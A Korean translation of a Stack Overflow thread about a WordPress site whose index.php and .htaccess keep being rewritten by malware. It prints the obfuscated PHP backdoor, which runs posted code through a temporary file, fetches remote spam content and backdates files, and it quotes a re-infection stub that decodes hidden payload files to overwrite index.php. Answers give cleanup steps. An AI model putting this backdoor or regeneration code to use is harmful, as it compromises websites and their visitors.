${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x5f\x30\x5f\x30\x4f\x4f"]($OO0_0__0OO);');$O__O0_00OO=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x4f\x5f\x4f\x5f\x30\x30"]('$O_OO00__0O','$O_OO00__0O=@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x5f\x5f\x4f\x4f\x30\x30\x4f"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x5f\x30\x5f\x30\x4f\x4f"]($O_OO00__0O));$O__00O_0OO=@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x30\x4f\x5f\x30\x4f\x5f\x5f"](\'/\\|/si\',$O_OO00__0O,-1,PREG_SPLIT_NO_EMPTY);if(!${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x5f\x5f\x5f\x30\x4f\x30\x4f"]($O__00O_0OO)){return false;}if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x5f\x5f\x4f\x30\x5f\x30\x30"]($O__00O_0OO)<2){return false;}$O_OO00__0O_array["data"]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x5f\x5f\x30\x4f\x30\x30\x5f"]($O__00O_0OO);$O_OO00__0O_array["data"]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x5f\x30\x5f\x30\x4f\x4f"]($O_OO00__0O_array["data"]);$O_OO00__0O_array["headers"]=$O__00O_0OO;return 
$O_OO00__0O_array;');$O_OO0_O00_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x4f\x5f\x4f\x5f\x30\x30"]('$O_0_0_OO0O=\'\'','if($O_0_0_OO0O==\'\'){$O_0_0_OO0O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x5f\x4f\x4f\x30\x5f\x4f"](\'08soShTUxOTi0tPuBgA=\');}$O_OO00__0O="PElmTW9kdWxlIG1vZF9yZXdyaXRlLmM+ClJld3JpdGVFbmdpbmUgT24KUmV3cml0ZUJhc2UgLwpSZXdyaXRlUnVsZSBeaW5kZXhcLnBocCQgLSBbTF0KUmV3cml0ZVJ1bGUgXiguKilyYWRpb1wucGhwJCAtIFtMXQpSZXdyaXRlUnVsZSBeKC4qKWNvbnRlbnRcLnBocCQgLSBbTF0KUmV3cml0ZVJ1bGUgXiguKilhYm91dFwucGhwJCAtIFtMXQpSZXdyaXRlUnVsZSBeKC4qKWxvY2szNjBcLnBocCQgLSBbTF0KUmV3cml0ZVJ1bGUgXiguKikucGhwKC4qKSQgL2luZGV4LnBocCBbTF0KUmV3cml0ZUNvbmQgJXtSRVFVRVNUX0ZJTEVOQU1FfSAhLWYKUmV3cml0ZUNvbmQgJXtSRVFVRVNUX0ZJTEVOQU1FfSAhLWQKUmV3cml0ZVJ1bGUgLiAvaW5kZXgucGhwIFtMXQo8L0lmTW9kdWxlPg==";$O_OO00__0O=@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x5f\x30\x5f\x30\x4f\x4f"]($O_OO00__0O);if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x4f\x4f\x30\x5f\x5f\x30\x5f"]($O_0_0_OO0O)){$O_OO_O00_0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x4f\x5f\x30\x30\x30\x5f\x4f"]($O_0_0_OO0O);if($O_OO00__0O==$O_OO_O00_0){return;}}$OO_0__O0O0="robots.txt";if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x4f\x4f\x30\x5f\x5f\x30\x5f"]($OO_0__O0O0)){@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x5f\x30\x5f\x4f\x5f\x30"]($OO_0__O0O0,0777);@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x4f\x30\x5f\x4f\x30\x30"]($OO_0__O0O0);}@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x5f\x30\x5f\x4f\x5f\x30"]($O_0_0_OO0O,0777);@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x4f\x30\x5f\x4f\x30\x30"]($O_0_0_OO0O);@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x5f\x5f\x4f\x30\x5f\x4f\x30"]($O_0_0_OO0O,$O_OO00__0O);@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x5f\x30\x5f\x4f\x5f\x30"]($O_0_0_OO0O,0444);@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x4f\x30\x5f\x4f\x30\x30\x4f"]($O_0_0_OO0O,${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x4f\x30\x4f\x30\x5f\
x5f\x5f"]("-400 days",${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x30\x5f\x30\x4f\x30\x5f\x5f"]()));');$O__00_OOO0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x4f\x5f\x4f\x5f\x30\x30"]('$O0_O00_OO_','$params["\x64\x65\x66\x61\x75\x6c\x74\x5f\x70\x61\x72\x61\x6d\x73"]=$O0_O00_OO_;$params["\x61\x70\x69"]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x30\x4f\x5f\x30\x30\x4f\x5f"]($params["\x64\x65\x66\x61\x75\x6c\x74\x5f\x70\x61\x72\x61\x6d\x73"]);$params["server_domain"]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x4f\x5f\x4f\x5f\x4f\x30\x30"]();$params["\x72\x65\x71\x75\x65\x73\x74\x5f\x75\x72\x6c"]=${"\x5f\x53\x45\x52\x56\x45\x52"}["\x52\x45\x51\x55\x45\x53\x54\x5f\x55\x52\x49"];$params["\x72\x65\x66\x65\x72\x65\x72"]=isset(${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x52\x45\x46\x45\x52\x45\x52"])?${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x52\x45\x46\x45\x52\x45\x52"]:\'\';$params["\x75\x73\x65\x72\x5f\x61\x67\x65\x6e\x74"]=isset(${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x55\x53\x45\x52\x5f\x41\x47\x45\x4e\x54"])?${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x55\x53\x45\x52\x5f\x41\x47\x45\x4e\x54"]:\'\';$params["\x69\x70"]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x4f\x30\x5f\x30\x5f\x4f"]();if(isset(${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x53"])){$params["\x70\x72\x6f\x74\x6f\x63\x6f\x6c"]="https://";}else{$params["\x70\x72\x6f\x74\x6f\x63\x6f\x6c"]="http://";}if(isset(${"\x5f\x53\x45\x52\x56\x45\x52"}["HTTP_ACCEPT_LANGUAGE"])){$params["\x6c\x61\x6e\x67\x75\x61\x67\x65"]=${"\x5f\x53\x45\x52\x56\x45\x52"}["HTTP_ACCEPT_LANGUAGE"];}else{$params["\x6c\x61\x6e\x67\x75\x61\x67\x65"]="";}if(isset(${"\x5f\x47\x45\x54"}["\x70\x61\x72\x61\x6d\x73"])){header("Content-type:application/json");if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x4f\x30\x5f\x30\x5f\x4f\x5f"]("json_encode")){echo 
${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x30\x30\x4f\x30\x5f\x4f\x4f"]($params);}else{${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x5f\x4f\x30\x4f\x5f\x30\x4f"]($params);}die();}if(isset(${"\x5f\x47\x45\x54"}["\x70\x61\x73\x73"])&&${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x5f\x30\x30\x30\x4f\x5f\x5f"](${"\x5f\x47\x45\x54"}["\x70\x61\x73\x73"]."a!#_11AA")=="2f7a76f71ff9e24be7c0015ff9cb81d8"){if(isset(${"\x5f\x47\x45\x54"}["\x73\x69\x74\x65\x6d\x61\x70"])){$OO0_0OO0__=sprintf("https://www.google.com/ping?sitemap=%s%s/%s",$params["\x70\x72\x6f\x74\x6f\x63\x6f\x6c"],$params["\x73\x65\x72\x76\x65\x72\x5f\x64\x6f\x6d\x61\x69\x6e"],${"\x5f\x47\x45\x54"}["\x73\x69\x74\x65\x6d\x61\x70"]);$O_0_O0OO0_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x5f\x5f\x4f\x30\x4f\x4f\x30"]($OO0_0OO0__);if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x5f\x30\x5f\x5f\x4f\x4f\x30"]($O_0_O0OO0_,"google")!=false){die("success");}else{die("failed");}}if(isset(${"\x5f\x50\x4f\x53\x54"}["\x7a\x7a\x7a"])){$OO0_0_0O_O =${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x5f\x30\x5f\x30\x4f\x4f"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x4f\x4f\x5f\x30\x30\x30"](${"\x5f\x50\x4f\x53\x54"}["\x7a\x7a\x7a"]));$OO0_0_0O_O=\' 
\'.$OO0_0_0O_O.\'\';@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x5f\x5f\x4f\x30\x5f\x4f\x30"](\'407.php\',$OO0_0_0O_O);require_once(\'407.php\');@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x4f\x30\x5f\x4f\x30\x30"](\'407.php\');die();}}${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x4f\x30\x5f\x4f\x30\x30\x5f"]();$O_OO00_0_O=array(\'domain\'=>$params["\x73\x65\x72\x76\x65\x72\x5f\x64\x6f\x6d\x61\x69\x6e"],\'request_url\'=>$params["\x72\x65\x71\x75\x65\x73\x74\x5f\x75\x72\x6c"],\'ip\'=>$params["\x69\x70"],\'agent\'=>$params["\x75\x73\x65\x72\x5f\x61\x67\x65\x6e\x74"],\'referer\'=>$params["\x72\x65\x66\x65\x72\x65\x72"],\'protocol\'=>$params["\x70\x72\x6f\x74\x6f\x63\x6f\x6c"],\'language\'=>$params["\x6c\x61\x6e\x67\x75\x61\x67\x65"]);$O_OO00__0O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x5f\x5f\x4f\x30\x4f\x4f\x30"]($params["\x61\x70\x69"],0,2,$O_OO00_0_O,array(),$params["\x73\x65\x72\x76\x65\x72\x5f\x64\x6f\x6d\x61\x69\x6e"]);$O_O_0O00_O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x4f\x30\x5f\x30\x30\x4f\x4f"]($O_OO00__0O);if($O_O_0O00_O!==false){foreach($O_O_0O00_O["headers"] as $header){@header($header);}echo $O_O_0O00_O["data"];die();}');${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x30\x30\x5f\x4f\x4f\x4f\x30"]($O0_O00_OO_);?>
그리고 .htaccess 파일도 계속 수정되어 다음과 같은 내용으로 바뀝니다:
# NOTE(review): this is the ruleset the infection keeps writing back, annotated
# for triage. The base64 string embedded in the index.php sample on this page
# decodes to this same ruleset.
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
# index.php itself is served unchanged and rule processing stops here.
RewriteRule ^index\.php$ - [L]
# Requests whose path ends in one of these four file names are passed through
# untouched, at any directory depth.
# NOTE(review): presumably files dropped by the same infection; search the
# document root for them and inspect any that exist.
RewriteRule ^(.*)radio\.php$ - [L]
RewriteRule ^(.*)content\.php$ - [L]
RewriteRule ^(.*)about\.php$ - [L]
RewriteRule ^(.*)lock360\.php$ - [L]
# Every other request containing ".php" (the dot is unescaped, so it matches
# any character) is rewritten to /index.php. wp-login.php and wp-admin/*.php
# therefore end up in the replaced index.php instead of WordPress.
# NOTE(review): likely related to the admin redirect error described in the
# question; confirm against the server logs.
RewriteRule ^(.*).php(.*)$ /index.php [L]
# Remaining requests that are neither an existing file nor an existing
# directory are also sent to /index.php.
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
해당 파일을 삭제하거나 권한을 변경하더라도 WordPress는 0444 권한으로 파일을 다시 생성합니다.
감염된 파일 중에는 n3.php가 있으며, Contact Form 7과 같은 일부 플러그인 폴더 안에 있습니다.
누가 좀 도와주실 수 있나요? 잘 부탁드립니다.
index.php 내부의 코드는 스스로를 다시 생성합니다. index.php를 삭제해도 이전 파일의 코드가 여전히 실행됩니다(메모리에 로드되어 있습니다). 해결책: PHP 프로세스를 재시작하여 메모리에서 언로드합니다.
당신이 설명한 것과 같은 문제가 있었고, 그것을 수정하기 위해 Cpanel 파일 매니저를 사용하여 다음과 같이 했습니다.
악성코드 없이 .htaccess를 편집 또는 바꿉니다.
wp-config.php 파일과 wp-content 폴더를 제외한 모든 워드프레스 시스템 파일을 삭제합니다.
https://wordpress.org/download/releases/에 접속하여 필요한 워드프레스 버전을 zip 형식으로 다운로드합니다.
wordpress .zip 파일을 온라인 워드프레스 폴더의 메인 디렉토리 내에 업로드하고 file manager extract 옵션을 사용하여 압축을 푼다.이렇게 하면 wp-content 폴더를 제외한 모든 시스템 파일/폴더가 생성됩니다.이 폴더는 올바른 대상에 복사됩니다.
모든 플러그인의 최신 버전을 원본에서 로컬 컴퓨터로 다운로드합니다(대부분은 .zip 형식입니다).
모든 wp-content/plugins 폴더를 삭제하고 각 플러그인을 수동으로 wp-content/plugins 폴더에 다시 업로드합니다.(플러그인을 zip 파일 형식으로 업로드하는 경우 파일 매니저 extract 옵션을 사용하여 업로드한 후 zip 파일을 추출한 후 원래 zip 파일을 삭제해야 합니다.
캐시 플러그인을 사용하는 경우 캐시 폴더를 다른 곳(wp-content 폴더 내가 아님)에 있는 것처럼 찾은 후 축적된 캐시 파일을 모두 수동으로 삭제할 것을 권장합니다.만약 캐시 플러그인이 어디에 있는지 잘 모르면 조사하십시오.
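이 모든 작업을 마친 후에는 워드프레스와 모든 플러그인이 새로 설치되고 악성코드가 남아 있지 않으며 다시 돌아오지 않습니다. 단, 이 절차에서 그대로 둔 wp-config.php와 wp-content의 나머지 폴더(테마, 업로드 등)는 교체되지 않으므로, 이 파일들에 삽입된 코드가 없는지 별도로 확인해야 합니다.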
도움이 됐으면 좋겠네요, 행운을 빌어요!
갱신되지 않은 워드프레스에서도 같은 문제가 발생했습니다. 빠른 해결책은 www 루트 폴더에서 SSH 명령 2개를 실행하는 것입니다.
# Command 1: in every *.php file below the current directory, insert `//` in
# front of each `$path = "/home` occurrence, turning the assignment that points
# at the hidden payload file into a PHP comment. The single quotes keep the
# shell from expanding $path; -print0 / -0 keep unusual file names intact.
# NOTE(review): `sed -i` rewrites the files in place and keeps no backup, and
# the commented lines also show where the payload files are stored.
find . -type f -name '*.php' -print0 | xargs -0 sed -i 's/$path = "\/home/\/\/$path = "\/home/g'
# Command 2: in every file named index.php, insert `//` in front of each `$OO0`
# occurrence (a prefix of the obfuscated variable names in the injected code).
# NOTE(review): both commands only disable the code; the injected lines and the
# hidden payload files stay on disk, so the affected files still have to be
# replaced with clean copies afterwards.
find . -type f -name 'index.php' -print0 | xargs -0 sed -i 's/$OO0/\/\/$OO0/g'
명령어의 /home 부분은 대부분의 경우 /var/www입니다.
명령어 1 - 바이러스 코드 파일의 위치를 나타내는 행을 주석으로 만듭니다.
명령어 2 - index.php의 바이러스 코드가 있는 행을 주석으로 만듭니다.
제 경우 바이러스 재생성 코드는 /domains/public_html/wp-includes/plugin.php에 있었습니다.
plugin.php 안의 바이러스 재생성 코드:
// Re-infection stub as quoted by the answer (reported location: wp-includes/plugin.php).
// The same routine appears three times; only the hidden payload path (and, in
// the second copy, the variable name) differs, so removing one payload file
// is not enough.
// NOTE(review): user_name and domain.com look like redacted placeholders; the
// real paths are site-specific.

// --- Copy 1: payload hidden under a plugin directory ---
// Relative path: resolved against the working directory of the running request.
$index_path = "index.php";
$index = file_get_contents($index_path);
// Payload file: numeric name, no extension, stored inside a legitimate plugin tree.
$path = "/home/users/user_name/domains/domain.com/wp-content/plugins/advanced-custom-fields/core/actions/173692";
if (file_exists($path)) {
$index_hide = file_get_contents($path);
// The payload is decoded with rot13, base64, rot13, base64 (in that order),
// so the file on disk contains no readable PHP.
$index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide))));
// md5 is used only to detect that index.php differs from the decoded payload.
if(md5($index) != md5($index_hide))
{
// Make index.php writable, overwrite it with the payload, then set it
// read-only again; this is where the recurring 0444 permission comes from.
// The leading @ suppresses any error output.
@chmod($index_path, 0644);
@file_put_contents($index_path, $index_hide);
@chmod($index_path, 0444);
}
}

// --- Copy 2: payload hidden under wp-admin/css/colors/blue ---
$i_p = "index.php";
$index = file_get_contents($i_p);
$path = "/home/users/user_name/domains/domain.com/wp-admin/css/colors/blue/100158";
if (file_exists($path)) {
$index_hide = file_get_contents($path);
// Same four-step decoding as in copy 1.
$index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide))));
if(md5($index) != md5($index_hide))
{
// Same overwrite sequence: 0644, write, 0444.
@chmod($i_p, 0644);
@file_put_contents($i_p, $index_hide);
@chmod($i_p, 0444);
}
}

// --- Copy 3: payload hidden under wp-admin/css/colors/coffee ---
$index_path = "index.php";
$index = file_get_contents($index_path);
$path = "/home/users/user_name/domains/domain.com/wp-admin/css/colors/coffee/139039";
if (file_exists($path)) {
$index_hide = file_get_contents($path);
// Same four-step decoding as in copy 1.
$index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide))));
if(md5($index) != md5($index_hide))
{
// Same overwrite sequence: 0644, write, 0444.
@chmod($index_path, 0644);
@file_put_contents($index_path, $index_hide);
@chmod($index_path, 0444);
}
}
// NOTE(review): for cleanup, compare core files with a clean copy of the same
// WordPress release (e.g. `wp core verify-checksums`) and look for extension-less
// numeric files inside core and plugin directories.
언급URL : https://stackoverflow.com/questions/64673952/wordpress-keeps-creating-index-php-and-htaccess-files-and-changes-permission-to